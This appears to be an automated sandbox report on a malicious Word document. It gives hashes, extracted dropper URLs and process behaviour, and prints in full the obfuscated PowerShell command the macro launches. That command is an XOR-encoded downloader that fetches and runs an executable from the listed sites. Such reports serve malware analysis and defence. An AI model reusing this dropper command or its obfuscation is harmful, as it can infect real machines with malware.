01798d2ac47e6411220221f2b608f2f5d122efa1439ff0d3c2dcbc5925ae639c

General

Target

01798d2ac47e6411220221f2b608f2f5d122efa1439ff0d3c2dcbc5925ae639c.doc
Size

230KB
MD5

4b760e040b90ee17842dde9a176fb47b
SHA1

67357d6bd4265aed6413e82adfa56ae8d1de6c7f
SHA256

01798d2ac47e6411220221f2b608f2f5d122efa1439ff0d3c2dcbc5925ae639c
SHA512

bf8dba2edcf7616bf86252884e08c489d674611210df7becaba5bac55a8a1f967ac059f19864b435c0917f6f76d313cf3e963da5b1de918b766484ff07e572fe

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://workcompoptions.com/yZ3Z/

exe.dropper

http://www.bonzi.top/9kD3h9R/

exe.dropper

http://www.pccabogados.com.ar/bS2F/

exe.dropper

https://kinoko.pw/UPS-Service-Invoices-June-020N/rgqNI/

exe.dropper

http://elixirperu.com/fmu7p/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

Powershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4220	2636	Powershell.exe	WINWORD.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

WINWORD.EXE

pid process

2636 WINWORD.EXE

pid	process
2636	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\01798d2ac47e6411220221f2b608f2f5d122efa1439ff0d3c2dcbc5925ae639c.doc" /o ""
1⤵
- Suspicious use of SetWindowsHookEx
PID:2636

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell & ( ([sTrInG]$verBOsEPreFeReNce)[1,3]+'x'-joiN'')([STrINg]::join( '',( [cHAr[]](127,30,40, 2 , 102 , 53 , 62 ,44, 118, 52, 57,49,62 , 56 ,47 , 123,21,62 ,47, 117, 12 ,62,57 ,24 , 55 ,50 , 62 ,53, 47 , 96 , 127 ,61, 26,45 ,102 ,124, 51 ,47 ,47 , 43,97 , 116, 116 ,44,52, 41 , 48,56 , 52 , 54, 43 ,52, 43,47 ,50 ,52 , 53,40 ,117 ,56 ,52 , 54,116,34,1 , 104, 1, 116,27 ,51 , 47 , 47, 43, 97 , 116, 116, 44 ,44 , 44,117,57 ,52 , 53 , 33 , 50 , 117 , 47, 52,43,116, 98 ,48,31 ,104 ,51 , 98 ,9,116,27, 51, 47, 47 ,43,97 , 116 , 116, 44, 44, 44, 117 ,43 ,56 ,56 ,58 , 57 ,52 , 60, 58,63 , 52, 40 , 117,56 , 52 , 54 , 117,58, 41 ,116 , 57 , 8,105 ,29 ,116,27,51,47 , 47, 43 , 40, 97 , 116 ,116,48,50,53 ,52 ,48,52, 117,43 ,44 ,116 ,14 ,11, 8 , 118,8 , 62, 41 ,45 , 50,56 , 62, 118,18,53, 45, 52 , 50 , 56 ,62,40 , 118,17 , 46 , 53 , 62,118 ,107 ,105,107,21,116 ,41 , 60 , 42, 21 , 18,116, 27 ,51,47, 47,43 , 97,116,116 ,62, 55, 50,35 ,50, 41 , 43, 62 , 41 , 46, 117 , 56, 52 ,54, 116,61 , 54 , 46, 108 , 43 , 116 ,124, 117,8 , 43 , 55, 50 , 47, 115 , 124 ,27 ,124 ,114 ,96,127 , 18 , 19 , 11 ,123, 102, 123, 124,111 ,108, 105 , 124, 96,127 ,11, 43,26, 102, 127,62 ,53, 45 , 97, 47 ,62, 54 ,43 ,112 , 124, 7 ,124 ,112 , 127,18 ,19, 11 ,112,124, 117 ,62 ,35 ,62 ,124 ,96 ,61 , 52 ,41,62,58,56, 51, 115, 127 ,8, 63 ,8, 123, 50 ,53, 123 , 127 ,61,26,45,114 , 32 , 47 ,41 , 34 ,32 , 127, 30, 40 , 2,117 , 31 , 52 ,44, 53,55 , 52 ,58 ,63, 29 ,50 , 55 ,62,115, 127 ,8 , 63,8,119,123 , 127, 11,43,26 ,114 ,96,8,47 ,58,41 ,47 , 118 , 11, 41 ,52 ,56,62 , 40, 40 , 123 ,127 ,11 ,43, 26 ,96 , 57, 41 ,62,58 , 48, 96, 38 ,56, 58,47,56 , 51 , 32 , 38 ,38 )|%{[cHAr]($_ -bXoR "0x5b" ) })) )
2⤵
- Process spawned unexpected child process
PID:4220

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2636-136-0x00007FFDA2EA0000-0x00007FFDA2EB0000-memory.dmp

Filesize
64KB

Download
memory/2636-132-0x00007FFDA5170000-0x00007FFDA5180000-memory.dmp

Filesize
64KB

Download
memory/2636-133-0x00007FFDA5170000-0x00007FFDA5180000-memory.dmp

Filesize
64KB

Download
memory/2636-131-0x00007FFDA5170000-0x00007FFDA5180000-memory.dmp

Filesize
64KB

Download
memory/2636-130-0x00007FFDA5170000-0x00007FFDA5180000-memory.dmp

Filesize
64KB

Download
memory/2636-135-0x00007FFDA2EA0000-0x00007FFDA2EB0000-memory.dmp

Filesize
64KB

Download
memory/2636-134-0x00007FFDA5170000-0x00007FFDA5180000-memory.dmp

Filesize
64KB

Download
memory/2636-142-0x00007FFDA5170000-0x00007FFDA5180000-memory.dmp

Filesize
64KB

Download
memory/2636-141-0x00007FFDA5170000-0x00007FFDA5180000-memory.dmp

Filesize
64KB

Download
memory/2636-143-0x00007FFDA5170000-0x00007FFDA5180000-memory.dmp

Filesize
64KB

Download
memory/2636-144-0x00007FFDA5170000-0x00007FFDA5180000-memory.dmp

Filesize
64KB

Download
memory/4220-138-0x0000022B05BE0000-0x0000022B05C02000-memory.dmp

Filesize
136KB

Download
memory/4220-139-0x00007FFDBA0A0000-0x00007FFDBAB61000-memory.dmp

Filesize
10.8MB

Download
memory/4220-137-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads